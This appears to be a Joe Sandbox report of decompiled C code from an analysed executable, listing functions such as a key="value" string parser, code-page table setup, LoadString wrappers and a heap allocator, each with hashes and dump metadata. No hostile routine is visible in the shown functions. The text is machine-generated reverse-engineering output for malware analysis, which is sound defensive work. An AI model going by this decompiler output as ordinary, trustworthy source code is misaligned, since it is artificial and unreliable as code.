                                          • Instruction ID: 551790b6ae67963d7c94afa5d69916b6b09ae611f895d6b9f891aac7cfc7161a
                                          • Opcode Fuzzy Hash: a2a1fe83cc9e0c6555ab30a5ba5d34d7e9637e7b1c96707fcad98147a719e390
                                          • Instruction Fuzzy Hash: AF010830140B00AFD7219B21DD5AB66BBA1BF04721F008B2DE9A7959E0CB76B951CB48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040D7CC(void* __ecx) {
                                          				signed int _t118;
                                          				signed int _t129;
                                          				signed int* _t130;
                                          				signed int _t150;
                                          				signed int _t151;
                                          				signed int _t160;
                                          				intOrPtr _t162;
                                          				signed int* _t180;
                                          				signed int _t181;
                                          				signed int _t190;
                                          				signed int _t191;
                                          				signed int _t192;
                                          				signed int _t195;
                                          				signed int _t196;
                                          				intOrPtr _t198;
                                          				void* _t200;
                                          				signed int* _t202;
                                          				void* _t203;
                                          
                                          				E00413954(E0041A61C, _t203);
                                          				_t200 = __ecx;
                                          				if( *((intOrPtr*)(__ecx + 8)) > 0x20 ||  *((intOrPtr*)(__ecx + 0x1c)) > 0x20) {
                                          					L31:
                                          					_t118 = 0;
                                          				} else {
                                          					E004032A8(_t203 - 0x28, 1);
                                          					 *((intOrPtr*)(_t203 - 0x28)) = 0x41b748;
                                          					_t150 = 0;
                                          					 *(_t203 - 4) = 0;
                                          					E0040D9F9(_t203 - 0x28,  *((intOrPtr*)(__ecx + 0x30)) +  *((intOrPtr*)(__ecx + 0x1c)));
                                          					_t190 = 0;
                                          					if( *((intOrPtr*)(_t200 + 0x1c)) <= 0) {
                                          						L5:
                                          						_t191 = 0;
                                          						if( *((intOrPtr*)(_t200 + 0x30)) <= _t150) {
                                          							L8:
                                          							E0040D9F9(_t203 - 0x28,  *((intOrPtr*)(_t200 + 0x44)));
                                          							_t192 = 0;
                                          							if( *((intOrPtr*)(_t200 + 0x1c)) <= _t150) {
                                          								L11:
                                          								 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
                                          								E004042AD(_t203 - 0x28);
                                          								_t160 = 0x20;
                                          								memset(_t203 - 0xd0, 0, _t160 << 2);
                                          								_t162 = 4;
                                          								 *(_t203 - 0x38) = _t150;
                                          								 *(_t203 - 0x34) = _t150;
                                          								 *(_t203 - 0x30) = _t150;
                                          								 *((intOrPtr*)(_t203 - 0x2c)) = 0;
                                          								 *((intOrPtr*)(_t203 - 0x3c)) = 0x41b378;
                                          								 *(_t203 - 4) = 1;
                                          								 *(_t203 - 0x4c) = _t150;
                                          								 *(_t203 - 0x48) = _t150;
                                          								 *(_t203 - 0x44) = _t150;
                                          								 *((intOrPtr*)(_t203 - 0x40)) = _t162;
                                          								 *((intOrPtr*)(_t203 - 0x50)) = 0x41b378;
                                          								 *(_t203 - 4) = 2;
                                          								 *(_t203 - 0x10) = _t150;
                                          								if( *((intOrPtr*)(_t200 + 8)) > _t150) {
                                          									do {
                                          										 *(_t203 - 0x14) = _t150;
                                          										_t198 =  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0xc)) +  *(_t203 - 0x10) * 4));
                                          										if( *((intOrPtr*)(_t198 + 0x14)) > _t150) {
                                          											do {
                                          												E004039DF(_t203 - 0x3c,  *(_t203 - 0x10));
                                          												 *(_t203 - 0x14) =  *(_t203 - 0x14) + 1;
                                          											} while ( *(_t203 - 0x14) <  *((intOrPtr*)(_t198 + 0x14)));
                                          										}
                                          										 *(_t203 - 0x14) = _t150;
                                          										if( *((intOrPtr*)(_t198 + 0x18)) > _t150) {
                                          											do {
                                          												E004039DF(_t203 - 0x50,  *(_t203 - 0x10));
                                          												 *(_t203 - 0x14) =  *(_t203 - 0x14) + 1;
                                          											} while ( *(_t203 - 0x14) <  *((intOrPtr*)(_t198 + 0x18)));
                                          										}
                                          										 *(_t203 - 0x10) =  *(_t203 - 0x10) + 1;
                                          									} while ( *(_t203 - 0x10) <  *((intOrPtr*)(_t200 + 8)));
                                          								}
                                          								_t195 = 0;
                                          								if( *((intOrPtr*)(_t200 + 0x1c)) > _t150) {
                                          									do {
                                          										_t151 = 1;
                                          										 *(_t203 +  *( *(_t203 - 0x30) +  *( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8) * 4) * 4 - 0xd0) =  *(_t203 +  *( *(_t203 - 0x30) +  *( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8) * 4) * 4 - 0xd0) | _t151 <<  *( *(_t203 - 0x44) + ( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8)[1] * 4);
                                          										_t195 = _t195 + 1;
                                          									} while (_t195 <  *((intOrPtr*)(_t200 + 0x1c)));
                                          									_t150 = 0;
                                          								}
                                          								 *(_t203 - 4) = 1;
                                          								E004042AD(_t203 - 0x50);
                                          								 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
                                          								E004042AD(_t203 - 0x3c);
                                          								_t180 = _t203 - 0xd0;
                                          								 *(_t203 - 0x14) = 0x20;
                                          								do {
                                          									 *(_t203 - 0x10) = _t150;
                                          									_t202 = _t203 - 0xd0;
                                          									do {
                                          										_t129 =  *_t180;
                                          										_t196 = 1;
                                          										if((_t129 & _t196 <<  *(_t203 - 0x10)) != 0) {
                                          											 *_t180 = _t129 |  *_t202;
                                          										}
                                          										 *(_t203 - 0x10) =  *(_t203 - 0x10) + 1;
                                          										_t202 =  &(_t202[1]);
                                          									} while ( *(_t203 - 0x10) < 0x20);
                                          									_t180 =  &(_t180[1]);
                                          									_t106 = _t203 - 0x14;
                                          									 *_t106 =  *(_t203 - 0x14) - 1;
                                          								} while ( *_t106 != 0);
                                          								_t130 = _t203 - 0xd0;
                                          								while(1) {
                                          									_t181 = 1;
                                          									if(( *_t130 & _t181 << _t150) != 0) {
                                          										goto L31;
                                          									}
                                          									_t150 = _t150 + 1;
                                          									_t130 =  &(_t130[1]);
                                          									if(_t150 < 0x20) {
                                          										continue;
                                          									} else {
                                          										_t118 = 1;
                                          									}
                                          									goto L32;
                                          								}
                                          								goto L31;
                                          							} else {
                                          								while(E0040DA1F(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x20)) + 4 + _t192 * 8))) == 0) {
                                          									_t192 = _t192 + 1;
                                          									if(_t192 <  *((intOrPtr*)(_t200 + 0x1c))) {
                                          										continue;
                                          									} else {
                                          										goto L11;
                                          									}
                                          									goto L32;
                                          								}
                                          								goto L30;
                                          							}
                                          						} else {
                                          							while(E0040DA1F(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x34)) + _t191 * 4))) == 0) {
                                          								_t191 = _t191 + 1;
                                          								if(_t191 <  *((intOrPtr*)(_t200 + 0x30))) {
                                          									continue;
                                          								} else {
                                          									goto L8;
                                          								}
                                          								goto L32;
                                          							}
                                          							goto L30;
                                          						}
                                          					} else {
                                          						while(E0040DA1F(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x20)) + _t190 * 8))) == 0) {
                                          							_t190 = _t190 + 1;
                                          							if(_t190 <  *((intOrPtr*)(_t200 + 0x1c))) {
                                          								continue;
                                          							} else {
                                          								goto L5;
                                          							}
                                          							goto L32;
                                          						}
                                          						L30:
                                          						 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
                                          						E004042AD(_t203 - 0x28);
                                          						goto L31;
                                          					}
                                          				}
                                          				L32:
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t203 - 0xc));
                                          				return _t118;
                                          			}

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: $
                                          • API String ID: 3519838083-227171996
                                          • Opcode ID: f310208c7012b047481696f3de0866f141f831578990e3312a3a639e5dd044ff
                                          • Instruction ID: b608afa5533618173c50a936dd0dc92eebd328cd23ff399218f1dfb4b0bc6294
                                          • Opcode Fuzzy Hash: f310208c7012b047481696f3de0866f141f831578990e3312a3a639e5dd044ff
                                          • Instruction Fuzzy Hash: 6A713571E0020A9FCB24DF99D481AAEB7B1FF48314F10457ED416B7691D734AA8ACF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 89%
                                          			E00403D5A(intOrPtr* __ecx, intOrPtr __edx) {
                                          				void* __edi;
                                          				void* _t69;
                                          				signed int _t70;
                                          				intOrPtr _t79;
                                          				intOrPtr _t90;
                                          				signed int _t91;
                                          				char _t98;
                                          				char _t116;
                                          				intOrPtr* _t136;
                                          				void* _t138;
                                          
                                          				E00413954(E004194DC, _t138);
                                          				_t136 = __ecx;
                                          				 *((intOrPtr*)(_t138 - 0x20)) = __edx;
                                          				E004042D6();
                                          				 *((intOrPtr*)(_t138 - 0x10)) = 0;
                                          				while(1) {
                                          					L1:
                                          					_t69 = E00403FE2(_t136, _t138 - 0x10);
                                          					_t146 = _t69;
                                          					if(_t69 == 0) {
                                          						break;
                                          					}
                                          					E00402EE1(_t138 - 0x50);
                                          					 *(_t138 - 4) = 0;
                                          					E00402EE1(_t138 - 0x44);
                                          					_t7 = _t138 - 0x14; // 0x414be4
                                          					 *(_t138 - 4) = 1;
                                          					E00403F3C(_t138 - 0x38,  *_t136 +  *((intOrPtr*)(_t138 - 0x10)));
                                          					 *(_t138 - 4) = 2;
                                          					if(E0040411F(_t138 - 0x38, _t138 - 0x50, _t146) == 0) {
                                          						L26:
                                          						E00403A9C( *((intOrPtr*)(_t138 - 0x38)));
                                          						E00403A9C( *((intOrPtr*)(_t138 - 0x44)));
                                          						E00403A9C( *((intOrPtr*)(_t138 - 0x50)));
                                          						L28:
                                          						_t70 = 0;
                                          						__eflags = 0;
                                          						L29:
                                          						 *[fs:0x0] =  *((intOrPtr*)(_t138 - 0xc));
                                          						return _t70;
                                          					}
                                          					_t15 = _t138 - 0x14; // 0x414be4
                                          					_t79 =  *_t15;
                                          					if(_t79 == 0) {
                                          						goto L26;
                                          					}
                                          					 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + _t79;
                                          					if(E00403FE2(_t136, _t138 - 0x10) == 0 ||  *((char*)( *_t136 +  *((intOrPtr*)(_t138 - 0x10)))) != 0x3d) {
                                          						goto L26;
                                          					} else {
                                          						 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + 1;
                                          						if(E00403FE2(_t136, _t138 - 0x10) == 0 ||  *((char*)( *_t136 +  *((intOrPtr*)(_t138 - 0x10)))) != 0x22) {
                                          							goto L26;
                                          						} else {
                                          							 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + 1;
                                          							 *((intOrPtr*)(_t138 - 0x2c)) = 0;
                                          							 *((intOrPtr*)(_t138 - 0x28)) = 0;
                                          							 *((intOrPtr*)(_t138 - 0x24)) = 0;
                                          							E0040243E(_t138 - 0x2c, 3);
                                          							 *(_t138 - 4) = 3;
                                          							while( *((intOrPtr*)(_t138 - 0x10)) <  *((intOrPtr*)(_t136 + 4))) {
                                          								_t90 =  *_t136;
                                          								_t116 =  *((intOrPtr*)(_t90 +  *((intOrPtr*)(_t138 - 0x10))));
                                          								 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + 1;
                                          								 *((char*)(_t138 - 0x1c)) = _t116;
                                          								if(_t116 == 0x22) {
                                          									_t91 = E0040411F(_t138 - 0x2c, _t138 - 0x44, __eflags);
                                          									__eflags = _t91;
                                          									if(_t91 == 0) {
                                          										break;
                                          									}
                                          									_push(_t138 - 0x50);
                                          									E004040BE( *((intOrPtr*)(_t138 - 0x20)), 0);
                                          									E00403A9C( *((intOrPtr*)(_t138 - 0x2c)));
                                          									E00403A9C( *((intOrPtr*)(_t138 - 0x38)));
                                          									 *(_t138 - 4) =  *(_t138 - 4) | 0xffffffff;
                                          									E0040213F(_t138 - 0x50);
                                          									goto L1;
                                          								}
                                          								if(_t116 != 0x5c) {
                                          									_push( *((intOrPtr*)(_t138 - 0x1c)));
                                          								} else {
                                          									_t98 =  *((intOrPtr*)(_t90 +  *((intOrPtr*)(_t138 - 0x10))));
                                          									 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + 1;
                                          									 *((char*)(_t138 - 0x18)) = _t98;
                                          									if(_t98 == 0x22) {
                                          										_push(0x22);
                                          									} else {
                                          										if(_t98 == 0x5c) {
                                          											_push(0x5c);
                                          										} else {
                                          											if(_t98 == 0x6e) {
                                          												_push(0xa);
                                          											} else {
                                          												if(_t98 == 0x74) {
                                          													_push(9);
                                          												} else {
                                          													E00401EE5(_t138 - 0x2c, 0x5c);
                                          													_push( *((intOrPtr*)(_t138 - 0x18)));
                                          												}
                                          											}
                                          										}
                                          									}
                                          								}
                                          								E00401EE5(_t138 - 0x2c);
                                          							}
                                          							E00403A9C( *((intOrPtr*)(_t138 - 0x2c)));
                                          							E00403A9C( *((intOrPtr*)(_t138 - 0x38)));
                                          							E00403A9C( *((intOrPtr*)(_t138 - 0x44)));
                                          							E00403A9C( *((intOrPtr*)(_t138 - 0x50)));
                                          							goto L28;
                                          						}
                                          					}
                                          				}
                                          				_t70 = 1;
                                          				goto L29;
                                          			}

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00403D5F
                                            • Part of subcall function 00403F3C: __EH_prolog.LIBCMT ref: 00403F41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: > @$KA
                                          • API String ID: 3519838083-301980584
                                          • Opcode ID: f9624756dcd051103a0faf5414ab264e1043146aad46313972ce47ae36e47b30
                                          • Instruction ID: 0797aa4f2666763f951e0621ef07ec53320c6840b80f95fc9e8c0876c74f2843
                                          • Opcode Fuzzy Hash: f9624756dcd051103a0faf5414ab264e1043146aad46313972ce47ae36e47b30
                                          • Instruction Fuzzy Hash: 27517D30D0020A9ACF15EF95C855AEEBF7AAF5430AF10452FE452372D2DB795B06CB89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E0041808D(void* __ebx, void* __edi) {
                                          				char _v17;
                                          				signed char _v18;
                                          				struct _cpinfo _v24;
                                          				char _v280;
                                          				char _v536;
                                          				char _v792;
                                          				char _v1304;
                                          				void* _t43;
                                          				char _t44;
                                          				signed char _t45;
                                          				void* _t55;
                                          				signed int _t56;
                                          				signed char _t64;
                                          				intOrPtr* _t66;
                                          				signed int _t68;
                                          				signed int _t70;
                                          				signed int _t71;
                                          				signed char _t76;
                                          				signed char _t77;
                                          				signed char* _t78;
                                          				void* _t81;
                                          				void* _t87;
                                          				void* _t88;
                                          
                                          				if(GetCPInfo( *0x4256c8,  &_v24) == 1) {
                                          					_t44 = 0;
                                          					do {
                                          						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
                                          						_t44 = _t44 + 1;
                                          					} while (_t44 < 0x100);
                                          					_t45 = _v18;
                                          					_v280 = 0x20;
                                          					if(_t45 == 0) {
                                          						L9:
                                          						E00418A6C(1,  &_v280, 0x100,  &_v1304,  *0x4256c8,  *0x4258e4, 0);
                                          						E0041881D( *0x4258e4, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x4256c8, 0);
                                          						E0041881D( *0x4258e4, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x4256c8, 0);
                                          						_t55 = 0;
                                          						_t66 =  &_v1304;
                                          						do {
                                          							_t76 =  *_t66;
                                          							if((_t76 & 0x00000001) == 0) {
                                          								if((_t76 & 0x00000002) == 0) {
                                          									 *(_t55 + 0x4256e0) =  *(_t55 + 0x4256e0) & 0x00000000;
                                          									goto L16;
                                          								}
                                          								 *(_t55 + 0x4257e1) =  *(_t55 + 0x4257e1) | 0x00000020;
                                          								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
                                          								L12:
                                          								 *(_t55 + 0x4256e0) = _t77;
                                          								goto L16;
                                          							}
                                          							 *(_t55 + 0x4257e1) =  *(_t55 + 0x4257e1) | 0x00000010;
                                          							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
                                          							goto L12;
                                          							L16:
                                          							_t55 = _t55 + 1;
                                          							_t66 = _t66 + 2;
                                          						} while (_t55 < 0x100);
                                          						return _t55;
                                          					}
                                          					_t78 =  &_v17;
                                          					do {
                                          						_t68 =  *_t78 & 0x000000ff;
                                          						_t56 = _t45 & 0x000000ff;
                                          						if(_t56 <= _t68) {
                                          							_t81 = _t87 + _t56 - 0x114;
                                          							_t70 = _t68 - _t56 + 1;
                                          							_t71 = _t70 >> 2;
                                          							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
                                          							_t88 = _t88 + 0x18;
                                          						}
                                          						_t78 =  &(_t78[2]);
                                          						_t45 =  *((intOrPtr*)(_t78 - 1));
                                          					} while (_t45 != 0);
                                          					goto L9;
                                          				}
                                          				_t43 = 0;
                                          				do {
                                          					if(_t43 < 0x41 || _t43 > 0x5a) {
                                          						if(_t43 < 0x61 || _t43 > 0x7a) {
                                          							 *(_t43 + 0x4256e0) =  *(_t43 + 0x4256e0) & 0x00000000;
                                          						} else {
                                          							 *(_t43 + 0x4257e1) =  *(_t43 + 0x4257e1) | 0x00000020;
                                          							_t64 = _t43 - 0x20;
                                          							goto L22;
                                          						}
                                          					} else {
                                          						 *(_t43 + 0x4257e1) =  *(_t43 + 0x4257e1) | 0x00000010;
                                          						_t64 = _t43 + 0x20;
                                          						L22:
                                          						 *(_t43 + 0x4256e0) = _t64;
                                          					}
                                          					_t43 = _t43 + 1;
                                          				} while (_t43 < 0x100);
                                          				return _t43;
                                          			}



























                                          APIs
                                          • GetCPInfo.KERNEL32(?,00000000), ref: 004180A1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Info
                                          • String ID: $
                                          • API String ID: 1807457897-3032137957
                                          • Opcode ID: 8b363f32da595bfb59a3e5cf7fceda2159d83bff833a4ab1ae99a185f1cff2df
                                          • Instruction ID: d0f9309d8466ab513fef0fe96190925d4c3a9a36aebfd3e00fd14af349a29a6b
                                          • Opcode Fuzzy Hash: 8b363f32da595bfb59a3e5cf7fceda2159d83bff833a4ab1ae99a185f1cff2df
                                          • Instruction Fuzzy Hash: 18417C322046586EEB22DB14CC4DFFB7FA8DB06700F9400EAD549C7162CA794985CBAA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 81%
                                          			E00405F5E(intOrPtr __ecx, struct HINSTANCE__* __edx, void* __esi) {
                                          				signed int _t38;
                                          				WCHAR* _t54;
                                          				WCHAR* _t58;
                                          				int _t61;
                                          				void* _t63;
                                          				intOrPtr _t68;
                                          
                                          				E00413954(E00419764, _t63);
                                          				_t68 =  *0x423148; // 0x1
                                          				 *(_t63 - 0x14) = __edx;
                                          				 *((intOrPtr*)(_t63 - 0x10)) = __ecx;
                                          				 *((intOrPtr*)(_t63 - 0x18)) = 0;
                                          				if(_t68 == 0) {
                                          					_push( *(_t63 + 8));
                                          					E00405EBC(_t63 - 0x30, __edx);
                                          					 *((intOrPtr*)(_t63 - 4)) = 1;
                                          					E00401A03();
                                          					_push( *((intOrPtr*)(_t63 - 0x30)));
                                          				} else {
                                          					 *(_t63 - 0x24) = 0;
                                          					 *(_t63 - 0x20) = 0;
                                          					 *((intOrPtr*)(_t63 - 0x1c)) = 0;
                                          					E00402170(_t63 - 0x24, 3);
                                          					 *((intOrPtr*)(_t63 - 4)) = 0;
                                          					_t61 = 0x100;
                                          					do {
                                          						_t61 = _t61 + 0x100;
                                          						_t9 = _t61 - 1; // -1
                                          						_t36 = _t9;
                                          						if(_t9 >=  *((intOrPtr*)(_t63 - 0x1c))) {
                                          							E00402170(_t63 - 0x24, _t36);
                                          						}
                                          						_t14 = _t63 - 0x14; // 0x414be4
                                          					} while (_t61 - LoadStringW( *_t14,  *(_t63 + 8),  *(_t63 - 0x24), _t61) <= 1);
                                          					_t54 =  *(_t63 - 0x24);
                                          					_t38 = 0;
                                          					if( *_t54 != 0) {
                                          						_t58 = _t54;
                                          						do {
                                          							_t38 = _t38 + 1;
                                          							_t58 =  &(_t58[1]);
                                          						} while ( *_t58 != 0);
                                          					}
                                          					_t54[_t38] = 0;
                                          					 *(_t63 - 0x20) = _t38;
                                          					E00401CE1( *((intOrPtr*)(_t63 - 0x10)), _t63 - 0x24);
                                          					_push( *(_t63 - 0x24));
                                          				}
                                          				E00403A9C();
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
                                          				return  *((intOrPtr*)(_t63 - 0x10));
                                          			}










                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00405F63
                                          • LoadStringW.USER32(KA,?,?,00000000), ref: 00405FBC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prologLoadString
                                          • String ID: KA
                                          • API String ID: 385046869-4133974868
                                          • Opcode ID: e6db0625694eca8672df4367e77b25990e3c0bbb9f4bdb8bdb41469bebcffd79
                                          • Instruction ID: f8b33de4bb70f64bdff40eb498b0250b344fd9cf2a6d880d3b442eae3703c9f6
                                          • Opcode Fuzzy Hash: e6db0625694eca8672df4367e77b25990e3c0bbb9f4bdb8bdb41469bebcffd79
                                          • Instruction Fuzzy Hash: B8212771D0011A9BCB05EFA1C9919EEBBB5FF08308F10407AE106B6291DB794E40CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00405EBC(intOrPtr __ecx, struct HINSTANCE__* __edx) {
                                          				intOrPtr _t29;
                                          				CHAR* _t43;
                                          				int _t49;
                                          				void* _t51;
                                          
                                          				E00413954(E00419748, _t51);
                                          				 *((intOrPtr*)(_t51 - 0x10)) = __ecx;
                                          				 *(_t51 - 0x14) = __edx;
                                          				 *((intOrPtr*)(_t51 - 0x18)) = 0;
                                          				 *(_t51 - 0x24) = 0;
                                          				 *((intOrPtr*)(_t51 - 0x20)) = 0;
                                          				 *((intOrPtr*)(_t51 - 0x1c)) = 0;
                                          				E0040243E(_t51 - 0x24, 3);
                                          				 *((intOrPtr*)(_t51 - 4)) = 0;
                                          				_t49 = 0x100;
                                          				do {
                                          					_t49 = _t49 + 0x100;
                                          					_t9 = _t49 - 1; // -1
                                          					_t27 = _t9;
                                          					if(_t9 >=  *((intOrPtr*)(_t51 - 0x1c))) {
                                          						E0040243E(_t51 - 0x24, _t27);
                                          					}
                                          					_t14 = _t51 - 0x14; // 0x414be4
                                          				} while (_t49 - LoadStringA( *_t14,  *(_t51 + 8),  *(_t51 - 0x24), _t49) <= 1);
                                          				_t43 =  *(_t51 - 0x24);
                                          				_t29 = 0;
                                          				if( *_t43 != 0) {
                                          					do {
                                          						_t29 = _t29 + 1;
                                          					} while ( *((intOrPtr*)(_t29 + _t43)) != 0);
                                          				}
                                          				 *((char*)(_t29 + _t43)) = 0;
                                          				 *((intOrPtr*)(_t51 - 0x20)) = _t29;
                                          				E00403D24( *((intOrPtr*)(_t51 - 0x10)), _t51 - 0x24);
                                          				E00403A9C( *(_t51 - 0x24));
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t51 - 0xc));
                                          				return  *((intOrPtr*)(_t51 - 0x10));
                                          			}








                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prologLoadString
                                          • String ID: KA
                                          • API String ID: 385046869-4133974868
                                          • Opcode ID: 65d677eaf710bde40107d5e97ee8b2feebca7ae19d827cde6303db2279eeba92
                                          • Instruction ID: 682fdee239e6c4724d42c8af7adc4720fc3e2d38c4520a7b7ac2604701000241
                                          • Opcode Fuzzy Hash: 65d677eaf710bde40107d5e97ee8b2feebca7ae19d827cde6303db2279eeba92
                                          • Instruction Fuzzy Hash: 6C1126B1D011199ACB06EFA5C9959EEBBB4FF18304F50447EE445B3291DB7A5E00CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004160FA() {
                                          				signed int _t15;
                                          				void* _t17;
                                          				void* _t19;
                                          				void* _t25;
                                          				signed int _t26;
                                          				void* _t27;
                                          				intOrPtr* _t29;
                                          
                                          				_t15 =  *0x425a28; // 0x0
                                          				_t26 =  *0x425a18; // 0x0
                                          				if(_t15 != _t26) {
                                          					L3:
                                          					_t27 =  *0x425a2c; // 0x0
                                          					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
                                          					_t17 = HeapAlloc( *0x425a34, 8, 0x41c4);
                                          					 *(_t29 + 0x10) = _t17;
                                          					if(_t17 == 0) {
                                          						L6:
                                          						return 0;
                                          					}
                                          					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4);
                                          					 *(_t29 + 0xc) = _t19;
                                          					if(_t19 != 0) {
                                          						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
                                          						 *_t29 = 0;
                                          						 *((intOrPtr*)(_t29 + 4)) = 0;
                                          						 *0x425a28 =  *0x425a28 + 1;
                                          						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
                                          						return _t29;
                                          					}
                                          					HeapFree( *0x425a34, 0,  *(_t29 + 0x10));
                                          					goto L6;
                                          				}
                                          				_t2 = _t26 * 4; // 0x50
                                          				_t25 = HeapReAlloc( *0x425a34, 0,  *0x425a2c, _t26 + _t2 + 0x50 << 2);
                                          				if(_t25 == 0) {
                                          					goto L6;
                                          				}
                                          				 *0x425a18 =  *0x425a18 + 0x10;
                                          				 *0x425a2c = _t25;
                                          				_t15 =  *0x425a28; // 0x0
                                          				goto L3;
                                          			}











                                          APIs
